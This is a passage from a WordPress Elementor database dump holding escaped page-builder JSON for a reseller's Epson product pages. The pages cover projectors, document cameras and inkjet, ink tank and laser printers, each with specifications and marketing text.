src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7783,3455,'_elementor_version','2.5.14'),(7786,3456,'_wp_page_template','template-fullwidth.php'),(7787,3456,'_elementor_edit_mode','builder'),(7788,3456,'_elementor_template_type','post'),(7789,3456,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":166,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson AcuLaser C9300N<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with 